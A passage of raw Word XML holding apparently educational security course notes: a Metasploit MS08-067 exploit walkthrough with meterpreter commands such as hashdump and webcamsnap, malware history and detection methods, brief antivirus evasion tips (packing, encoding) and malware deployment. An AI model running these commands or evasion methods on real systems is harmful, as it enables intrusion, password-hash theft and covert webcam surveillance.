        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- search for an exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/ms08_067_netapi</w:t>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-- telling </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to use a specific exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>set RHOST 192.168.1.24</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- setting the remote host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- runs the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>RUNS EXPLOIT</w:t>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
        <w:t>--now it shows C:\WINDOWS\system32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>webcamsnap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009606AB" w:rsidRDefault="009606AB" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009606AB" w:rsidRDefault="009606AB" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Malware </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Definitions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &amp; History</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1947 - </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>First</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bug found. Literally a moth inside a computer causing a system crash.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1961 - </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Researchers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at Bell labs create a game where programs can kill other programs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1971 - Creeper virus on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ARPANet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. "I am the Creeper, catch me if you can."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1974 - Rabbit virus on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ARPAnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1982 - Elk Cloner on the Apple </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ii</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>. Boot sector virus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1986 - Brain virus. Worldwide. First IBM PC-based virus. Virus on floppy disk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1987 - Vienna virus. First virus to destroy data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1989 - IBM introduces </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00754FF8">
        <w:t>Viruscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. First commercial Antivirus offering.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00D12C69" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Virus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First theoretical work done in 1947. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Self-replicating, can make copies of itself and find new hosts to move to by doing so.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>May or may not be destructive in nature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Uses other programs (attached).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00D12C69" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Worm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Also self-replicating</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00754FF8" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Standalone</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>program</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Can</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> exist on </w:t>
      </w:r>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> own. It has 2 goals, 1 of which is to </w:t>
      </w:r>
      <w:r>
        <w:t>replicate</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> itself on to other systems and the other is to do </w:t>
      </w:r>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> primary function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00D12C69" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Trojan </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8" w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>horse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Malicious software that looks like something else. Often it is designed to look like a normal piece of kit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00D12C69" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Root Kit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Hides existence of certain other types of software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>May be used to maintain privileged access to a system through a backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**Detection of Malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Commonly</w:t>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:t xml:space="preserve">there are </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a couple of ways to do this between either IDS or antivirus software. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00D12C69" w:rsidRDefault="00754FF8" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Anomaly</w:t>
      </w:r>
      <w:r w:rsidR="003B567C" w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> based</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Baseline needs to be measured. First need to find out what is normal on the network and then report on anything out of the ordinary. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00D12C69" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Signature based</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Taking a known signature of how a virus behaves on the network and comparing traffic to it to detect it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Check any file or program against the signature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Security Essentials is the free MS AV that can perform other functions like malware detection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Clam AV on Linux and Mac is a decent one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00D12C69" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IDS. Intrusion Detection System</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Host based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Create a hash of all critical files on a system and store it in a db. Periodically check the files against the hash to see if anything has been modified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Network based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Snort can be quite complicated. Basic Analysis and Security Engine (BASE) is a type of SIEM - Snort feeds it. Can see Snort rules in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/snort/rules$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D12C69" w:rsidRDefault="00D12C69" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Need to know how packets are built to fully understand how the signature based rules work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In BASE you can see the alarms that snort has triggered for analysis. Shows the kind of alarm which then requires further investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Look at web connections - use a proxy. Put a malware detection engine on proxy. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Malware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will often interact with the web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Antivirus evasion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>How to deploy some malware without AV detecting it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AV programs are typically signature based. Try and make your malware look different from any known definitions of known malware. Malware will morph itself to try and evade AV. Write </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> own code. Use different encryption methods to try and evade AV. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Packing - stuff an exe inside a different package. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Encode it / portions of it - </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>obscuring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data so it can't be detected. Base64 as example.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00754FF8" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Anomaly</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> detection is obviously different as it works by detecting things that are different from normal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An advantage is it is possible to create a lot of false positives by making lots of changes on the network and then sneaking in amongst these. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Anomaly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detection can cause a lot of work and often things get shut down when in reality there is no need to. Manpower &amp; resources intense.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Deployment of Malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Need some sort of delivery </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>method</w:t>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:t xml:space="preserve"> for the malware and also n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eed the target to click on an exe file or visit a certain website. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Zeus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a malware wizard that has a botnet connection associated to it. Has a builder app to help make malware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
